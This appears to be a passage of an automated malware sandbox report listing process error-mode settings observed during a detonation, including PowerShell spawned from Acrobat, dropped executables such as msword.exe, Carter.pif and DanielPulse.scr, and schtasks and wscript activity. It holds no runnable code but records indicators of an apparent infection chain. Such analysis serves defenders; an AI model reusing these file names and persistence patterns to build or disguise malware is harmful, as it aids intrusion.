              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
